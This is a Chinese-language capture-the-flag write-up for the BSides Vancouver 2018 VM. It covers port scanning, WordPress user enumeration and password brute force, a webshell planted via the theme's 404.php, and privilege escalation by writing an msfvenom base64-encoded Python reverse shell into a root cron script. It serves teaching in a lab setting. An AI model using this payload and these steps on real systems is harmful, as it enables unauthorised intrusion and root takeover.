[Write-up]BSides-Vancouver

关于

  1. 下载链接
  2. 目标:拿到root用户目录下的flag.txt
  3. 全程无图!

信息收集

  1. 因为虚拟机网络是设置Host-only,所以是vmnet1这张网卡,IP段为192.168.7.1/24
  2. nmap -T4 192.168.7.1/24 -A
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Nmap scan report for 192.168.7.128
Host is up (0.00040s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 17:52 public
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
| 2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_ 256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (2 hosts up) scanned in 16.54 seconds
  1. 从上面可以看到服务器开放了21端口,对应的是FTP服务,还是可以匿名访问的。

    浏览器服务:ftp://192.168.7.128/public/users.txt.bk

  2. 还开放了80端口,robots.txt里有一个/backup_wordpress目录

    很明显式一个WordPress,直接上wpscan扫一下

  3. wpscan --url http://192.168.7.128/backup_wordpress/ --enumerate

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
[+] WordPress theme in use: twentysixteen - v1.2

[+] Name: twentysixteen - v1.2
| Last updated: 2018-05-17T00:00:00.000Z
| Location: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/
| Readme: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/readme.txt
[!] The version is out of date, the latest version is 1.5
| Style URL: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/style.css
| Referenced style.css: wp-content/themes/twentysixteen/style.css
| Theme Name: Twenty Sixteen
| Theme URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...
| Author: the WordPress team
| Author URI: https://wordpress.org/

[+] Enumerating usernames ...
[+] We identified the following 2 users:
+----+-------+------+
| ID | Login | Name |
+----+-------+------+
| 1 | admin | admi |
| 2 | john | joh |
+----+-------+------+
[!] Default first WordPress username 'admin' is still used

其实很多漏洞都是XSS或其他需要管理员交互的漏洞,所以很难利用。这里收集到的有博客用的主题,管理员的用户名为john,在博客写的也可以看出来。

爆破

  1. wpscan --url http://192.168.7.128/backup_wordpress/ --username john --wordlist dic.txt

  2. 得到密码是enigma

  3. 登录改主题的404.php,getshell后发现没有root权限。

  4. 获取任务定时计划cat /etc/crontab

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.

    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

    # m h dom mon dow user command
    17 * * * * root cd / && run-parts --report /etc/cron.hourly
    25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    * * * * * root /usr/local/bin/cleanup
  5. 在这可以看到有一个用root权限运行的cleanup的脚本。

  6. 先生成反弹shell的payload
1
2
3
4
5
6
7
8
9
10
11
12
13
[email protected]:~$ sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.7.1 lport=4444 R

[sudo] kali-team 的密码:

[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload

[-] No arch selected, selecting arch: cmd from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 601 bytes

python -c "exec('aW1wb3J0IHNvY2tldCAgICAgLCAgICAgICAgIHN1YnByb2Nlc3MgICAgICwgICAgICAgICBvcyAgICAgOyAgICAgICBob3N0PSIxOTIuMTY4LjcuMSIgICAgIDsgICAgICAgcG9ydD00NDQ0ICAgICA7ICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgLCAgICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgIDsgICAgICAgcy5jb25uZWN0KChob3N0ICAgICAsICAgICAgICAgcG9ydCkpICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDApICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDEpICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDIpICAgICA7ICAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
  1. 用nc监听本地的4444端口nc -lvp 4444
  2. 把payload复制到cleanup脚本里保存,坐等shell反弹回来
  3. 获取flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[email protected]:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.7.128] port 4444 [tcp/*] accepted (family 2, sport 51156)
ls
flag.txt
id
uid=0(root) gid=0(root) groups=0(root)
cat flag.txt
Congratulations!

If you can read this, that means you were able to obtain root permissions on this VM.
You should be proud!

There are multiple ways to gain access remotely, as well as for privilege escalation.
Did you find them all?

@abatchy17

write-up录像

CTF-BSides Vancouver: 2018 (Workshop)